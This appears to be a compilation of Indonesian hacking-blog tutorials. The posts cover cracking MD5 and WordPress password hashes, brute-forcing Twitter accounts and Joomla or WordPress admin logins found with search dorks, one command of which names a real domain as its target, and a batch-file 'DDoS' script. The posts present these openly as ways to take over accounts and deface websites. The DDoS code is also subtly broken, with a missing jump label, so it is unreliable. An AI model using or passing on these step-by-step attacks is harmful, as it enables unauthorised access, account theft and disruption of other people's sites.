Mass Password Cracking Using John The Ripper | Crack Hash Password dengan John The Ripper

Ya, kali ini saya mau share crack md5 hash password dengan John The Ripper. Udah lama sih punya. Biar blog tetep update aja makanya share ini . :D . Software ini tentu bermanfaat bagi yang suka main SQLi dan menemukan password yang di hash.

Tools ini tidak hanya mampu untuk memecahkan password MD5 . bisa MD4, SHA, SFS, LM , dll.

Kelebihan lain tools ini adalah kita bisa melakukan mass cracking . Artinya tidak cuma submit hash satu satu.  Langsung 1000 juga bisa karena kita akan menaruhnya di file.txt . Oke langsung saja ya.

Pertama, download dulu John The Ripper Password Cracker

Dalam tutorial ini saya letakkan tools nya di G:/Tools/john

Sehingga di folder john nanti ada dua folder lagi, run dan doc .



Defaultnya file ini sudah memiliki dictionary password sendiri di file password.lst . tapi kalo kalian ingin mencoba wordlist kalian sendiri bisa simpan di folder /run/ dengan format .txt .



Cara menggunakannya, siapkan wordlist dan list password yang ingin di hash di foder /run/ .

Untuk testing saja. Silahkan lihat gambar berikut.

saya membuat list password dengan nama p.txt serta list hash dengan nama u.txt

Format pemasukan list password yang akan di hash :

• passwordhash


• username:passwordhash

Jika kalian ingin memberi penomoran ya pisahkan dengan tanda titik dua ( : ) . contoh 1:0b909d567a737b73862a4fb446d49e9b



Sekarang saat nya eksekusi.

Buka john.exe nya . lewat cmd tentunya.

G:

cd\Tools\john\run

 Setelah itu , ketik john .

maka akan muncul list command yang bisa dipakai .

disitu sudah perintah perintahnya.

Buat yang belum jelas, untuk melakukan cracking password kita menggunakan command

john --wordlist=wordlist.txt hash.txt

atau kadang ada hash password yang karakteristik nya sama ,contoh nya jumlah karakter hash nya sama . Maka gunakan perintah .

john --wordlist=wordlist.txt --format=format-hash hash.txt

Berhubung di tutorial ini saya membuat file p.txt dan u.txt . Dan password yang akan saya hash adalah raw-md5 (md5 memiliki banyak kemiripan dengan banyak tipe hash) maka command nya

john --wordlist=p.txt --format=raw-md5 u.txt

Jika sukses maka akan muncul hasilnya :

Loaded 4 password hashes with no different salts (Raw MD5 [SSE2i 10x4x3])

sendy            (1)

ariani           (2)

sinka            (3)

juliani          (4)

guesses: 4  time: 0:00:00:00 DONE (Mon May 26 06:03:44 2014)  c/s: 79.60  trying

: sendy - ayu

Use the "--show" option to display all of the cracked passwords reliably



Bagaimana ? mudah kan ?

Selamat mencoba.

Hack Akun Twitter dengan BruteForce

Oke , kali ini saya mau share cara hack akun twitter dengan teknik bruteforce. Bruteforce loh ya, bukan sprite ular. wkwkwk :v .

Oke langsung saja ya daripada kelamaan intro :D

Bahan bahan :

Python [ buat yang pake windows. kalo udah di install ya skip ke langkah berikutnya]

Mechanize

Tools BruteForce [ simpan dengan filetype .py ]



Langkah Langkah :

1. Install Python , kalo ini gampang tinggal klik klik :v

2. Install Mechanize.

Caranya ,

1. ekstrak file .zip yang kalian download diatas. 


2. Untuk memudahkan ekstrak saja di dir C:


3. Lalu buka CMD , ketik cd/mechanize-0.2.5 (karena tadi ngekstrak file nya di direktori itu)


4. kalo sudah , ketik setup.py install . Tunggu proses install selesai.

3. Sekarang , tinggal simpan bahan yang ketiga yaitu tools nya . Terserah di direktori mana . penting formatnya .py . Sebagai contoh , ane simpen di C:/tools/ dengan nama sendy.py

4. Buka dengan CMD. cd/tools/ (karena tadi nyimpennya di tools)

5. lalu ketik sendy.py (nama file nya l3r ! )

6. nah, nanti disuruh masukin username twitter yang mau di anu anu, tekan enter. lalu disuruh masukin list password yang digunakan untuk bf nya.

7. List password harus satu folder dengan tools bruteforce nya. Misal ane simpen dengan nama akicha.txt

8. Tinggal tunggu proses bruteforce selesai. :)

Udah saya test. sampai artikel ini diterbitkan tools nya 100% work !!

Selamat mencoba.

salam crott

./nattasha

Crack Semua Jenis Hash Menggunakan OclHashcat

Assalamualaikum...

Sebelumnya udah pernah membahas mengenai Tool untuk memecahkan kode2 hash baik dengan memanfaatkan wordlist maupun secara bruteforcing. kali ini hanya sedikit berbeda, tools ini sebenarnya masih ada kekerabatan dengan Hashcat, hanya saja oclhashcat terlihat lebih mumpuni dalam melakukan proses cracking Hash dari segi estimasi waktu dan kecepatannya. tidak seperti tools sebelumnya yang membutuhkan waktu yg cukup lama untuk mendapatkan hasil proses cracking hashnya. tapi untuk bisa menggunakan tools ini, dibutuhkan spesifikasi yang cukup tinggi juga, berhubung lappie saya spesifikasinya tidak mendukung, jadi saya tidak bisa mencobanya :3

Usage:

./oclHashcat-lite32.bin e10adc3949ba59abbe56e057f20f883e (linux)

oclHashcat-lite32.exe e10adc3949ba59abbe56e057f20f883e (windows)

Requirements:

• NVidia users require ForceWare 310.32 or later

• AMD users require Catalyst 13.1 -exact-

Algorithms

• MD5
• md5($pass.$salt)
• Joomla
• SHA1
• nsldap, SHA-1(Base64), Netscape LDAP SHA
• sha1($pass.$salt)
• nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
• Oracle 11g
• MSSQL(2000)
• MSSQL(2005)
• MySQL
• MD4
• md4($pass.$salt)
• NTLM
• Domain Cached Credentials, mscash
• SHA256
• sha256($pass.$salt)
• descrypt, DES(Unix), Traditional DES
• SHA512
• sha512($pass.$salt)
• Cisco-PIX MD5
• Double MD5
• vBulletin < v3.8.5
• vBulletin > v3.8.5
• IPB2+, MyBB1.2+
• LM
• Oracle 7-10g, DES(Oracle)
• SHA-3(Keccak)
• Half MD5
• NetNTLMv1-VANILLA / NetNTLMv1+ESS
• NetNTLMv2
• Cisco-IOS SHA256

Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

 Content Creator : Onix AQua

Joomla Bruteforce

Assalamualaikum...

Hai sobat, udah pada tau belum tentang bruteforce? :o kalo belum silahkan tanya karo mbah google, aku yo males arek tekok2 karo mbahku :3 hahaha... yo wes lah.. :p

Pada postingan sebelumnya saya sudah membahas mengenai brutefoce, tapi sekarang kasusnya berbeda. kalo sebelumnya bruteforce untuk CMS Wordpress, nah yang ini khusus untuk CMS Joomla :D

Toolsnya sendiri ini dibuat oleh om saya, tapi ga tau omnya yang mana :( cuma tau nicknya aja :D yah siapa yg kagak kenal sama om Hmei7 :D entahlah saya juga ga kenal, yang saya kenal cuma om Hiddenymei12,, wkwkwkwk :D v thanks to om Hmei7, ijin pinjem toolsnya :D (*biar ga kena kritik :D )

Lanjuut dah, sebelum coba2 siapin dulu bahan2nya:

1. Dork: inurl:"/templates/beez5/" intitle:Index of /administrator/

2. Brute v.2 | Download

3. Live Target : www.live-target.pusku.com/joomla/

Lanjut lagi, :)

Yah seperti biasa, kalo mau nyari target silahkan gunakan dork, kembangin dorknya biar lebih maknyoos :D

Nah, kalo sudah nemu banyak targetnya silahkan kumpulkan dan simpan dalam file listsite.txt, disini ane cuma satu aja, sekedar buat coba2 apakah toolsnya masih bekerja atau tidak. :p ya begitulah :p dan kalo list passwordnya mo dibanyakin juga boleh :p

Selanjutnya kita jalankan Toolnya, lalu klik Load File, pilih file yg berisi web target sobat! lalu klik open! dan  klik Scan...

Tinggal nunggu hasilnya  :) yang sabar yah :p

Kalo udah nemu password yang cocok, tinggal login dah!

Nah ternyata toolnya masih bekerja dengan baik :)

Kalo sobat mau coba silahkan saja :) tapi saya ga yakin bisa nemu web yang password mudah ditebak, :D yah apa salahnya dicoba :v kalo ga dicoba siapa yang tau :v usaha dunk jangan cuma enaknya doank, wkwkwk :D

Sekian tutorial ini, mudah2an bermafaat dan bisa menambah pengetahuan sobat semua :)

Content Creator: Onix AQua Menyapa ^_^

Crack Hash Tanpa Wordlist | MD5 Bruteforce

Assalamualaikum...

Hayoo,, Siapa yg suka make SQL Injection? pasti kendalanya saat Crack password Hashnya kagak temu,, wkwkwk yang sabar yah, kalo ga bisa di crack ya udah tinggalin aja :p

Eiiit,, bentar dolo, ni ane punya tools buat crack Hash MD5 tanpa menggunakan wordlist, kali aja berguna :) jadi ga repot2 dah ngumpulin banyak wordlist ampe gigaan sizenya.. punya saya 1 GB wkwkk :p


MD5 Bruteforce | Download


kalo udah download langsung aja dah dibuka pake Terminal :) caranya liat gambar aja :)

Nah Selanjutnya kita masukkan perintahnya : md5.exe -h hashsobat -c karakter

Katerangan :

-c aA0~

a   set a untuk karakter huruf kecil
A   set A untuk karakter huruf kapital
0   set 0 untuk karakter angka / digit
~   set ~ untuk karakter simbol khusus

-C "abc23#"       karakter tambahan
-X "0D0A00"       karakter dalam bentuk Hex

usage:

md5.exe -h 827ccb0eea8a706c4c34a16891f84e7b -c 0

Selanjutnya tinggal nunggu hasilnya aja :)

Nah tuh,, udah ketemu passnya ga nyampe 1 detik :)

Catatan: dengan metode Bruteforce ini kemungkinan berhasil adalah 100%!! Hanya saja membutuhkan waktu yang lama. Lamanya proses cracking tergantung dari spesifikasi kompie/lappie sobat serta kombinasi password! Semakin rumit kombinasi passwordnya maka semakin lama pula proses cracking untuk mendapatkan hasilnya, bisa hanya sekitar 1 detik, 1 menit, 1 jam, 1 hari, 1 minggu, 1 bulan, bahkan bisa nyampe 1 tahun ? :o kecuali kalo sobat punya Super Komputer, apapun kombinasi passwordnya bisa sobat crack hanya memerlukan beberapa waktu aja :D

Yah begitulah, tak ada yang mudah dalam dunia hacking, tapi disitulah letak seni nya, semakin sulit maka akan semakin menarik :)


Sekian tutorial saya, moga bermanfaat aja :)


Content Creator : Onix AQua

Crack Hash MD5(wordpress) dengan Hashcat

Assalamualaikum.. :)

Hay Sobat, ketemu lagi dahh :D Pernah liat yg seperti dibawah ini? :D

$P$B12345678SK.X5r1iISZN0baAvEvEj0
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.

Nah, ane sekarang mau share tentang trik bagaimana ngecrack password hash yang digunakan pada web yg menggunakan CMS Wordpress. Soalnya ane liat banyak sekali yang masih bingung bagaimana caranya bahkan ga tau sama sekali tentang password hash wordpress. berbeda dengan password hash MD5 rata2 tools decript/crack nya udah bertebaran dimana-mana baik offline maupun online. 

Saran ane kalo mau bisa crack password hash harus tau dulu jenis-jenis hash tersebut. silahkan sobat cari dah di google banyak berserakan :D banyak baca banyak ilmu :p

Cukup dah ngomel ngomelnya :D langsung ke TKP :D

Sediakan Bahan - Bahan :

1. Hashcat | Download Password: Lihat

2.Wordlist | Download | Download

3.Sedikit Otak, dan Kesabaran :p

Langkah - Langkah:


Pertama extrack file hashcat dan wordlist dipartisi disk yg sobat inginkan, kalo ane disini ane letak di partisi D:\ liat gambar baik2 tuh :D

Lalu buka Hashlist.txt dan masukkan Hash yg mau sobat crack, dan save lagi :D

Selanjutnya buka terminal command, cari aja di Start>Run>ketik cmd! dan enter!

Setelah terminal terbuka, posisikan directori ke folder D:\Hashcat. liat gambar!

Selanjutnya ketik perintah : hashcat-cli32.exe -m 400 hashlist.txt wordlist.txt  lalu enter!

Silahkan sobat tunggu beberapa tahun yah :D eh, beberapa saat :D tunggu ampe selesai aja ;)

Nah tuw, udah keluar hasilnya :


$P$B12345678SK.X5r1iISZN0baAvEvEj0:l4I2GL4HsK7Tw
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0:r3dm0nd_admin
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/:4dm!n_w38
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0:w38m45t3r
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.:!nd0n3s!4n_cy83r_4rmy

Note: "Biar lebih maknyoooss, banyakin aja wordlistnya :D punya ane ampe 1 GB :3"

Jika sobat ingin meggunakan perintah2 yg lain atau mau coba crack hash jenis yg lain, silahkan sobat ketik perintah :  hashcat-cli32.exe --help

Sekian tutorial singkat dari ane, kalo ada yg kurang mohon dikoreksi, ntar ane perbaiki :D

Wasalamualaikum..

Contet Creator: Onix AQua

Cara Mudah Deface Wordpress Site Dengan WP Bruteforce

UPDATE: Link sudah diperbaiki... :)

Salam Sobat,, ;)


Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: http://indocyberarmy.blogspot.com

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute

Lalu buka comand dengan cara : Klik Start>Run>ketik cmd

Biasanya posisi default directories di Cmd : C:\User\User_Name>

Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>

 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 

Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!

Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10

Lalu tekan enter!

Tunggu proses hingga selesai!

Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!

GoodLuck!! :D

Content Created By Onix AQua


tag : cara deface wordpress, brute attack wordpress, deface website mudah

Down Server With DDoS

Kali ini saya akan mempraktekkan DDOS melalui Notepad. Langsung saja, berikut tutorialnya:

LANGKAH 1:  Copy code-code dibawah ini :

Code:

        @echo off
    mode 67,16
    title DDOS Attack
    color 0a
    cls
    echo.
    echo DDOS With Batchfile
    echo.
    set /p x=Server-Target:
    echo.
    ping %x%
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=ip Host:
    echo.
    set /p n=Packet Size:
    echo.
    DOS
    color 0c
    echo Attacking Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS


LANGKAH 2: Buka application notepad dan paste code-code diatas tadi.

LANGKAH 3: Save file anda seperti dibawah :

File Name : DDoS Attack.bat Save As Type : All File <--- p="p" penting="penting">
    Quote: bisa disave dgn namafile bebas sesuka bro n sist..     tapi ingat , File Extensi harus berformat .Bat


Cara-cara menggunakannya :
1. Double click file anda itu.
2. Akan tertera : Server-Target: Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

    Quote:Contoh :     Sebelum = http://www.google.com/     Tukarkan kepada = www[.]google[.]com

    *hilangkan tanda '[]'.     Setelah memasukkan url itu, tekan enter.


LANGKAH 4: Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.

Setelah selesai ping, akan keluar seperti ini :

Pinging http://www.google.com

[209.85.175.106] with 32 bytes of data:
Reply from 209.85.175.106: bytes=32 time=30ms TTL=56
Reply from 209.85.175.106: bytes=32 time=40ms TTL=55
Reply from 209.85.175.106: bytes=32 time=24ms TTL=56
Reply from 209.85.175.106: bytes=32 time=36ms TTL=56

Ping statistics for 209.85.175.106:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 24ms, Maximum = 40ms, Average = 32ms

209.85.175.106 <----- address="address" bagi="bagi" http:="http:" ip="ip" nbsp="nbsp" p="p" www.google.com="www.google.com">    Quote: cara sama kok untuk web yg lain

4. Selepas itu, akan terpapar di tool itu : ip Host: Masukkan saja ip address yg anda dapat tadi.

Contoh : ip Host:209.85.175.106

dan tekan enter.

5. Pada akhirnya akan keluar pula : Packet Size : Letakkan letakkan semau anda sebagai POWER !

Contoh : Packet Size : 10000000

Dan tekan enter.

6. Akan terpapar : Attacking Server.....

Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

Jika ingin hasil yang maksimal , harus DDOS dengan beberapa komputer biar cepat down targetnya.

Sekian tutorial ini, agar bisa menjadi bahan pembelajaran bagi para Admin Server untuk selalu meningkatkan keamanan servernya. Salah satunya bisa menggunakan DDOS Protection, dll.

Sumber :: Cyber4rt.com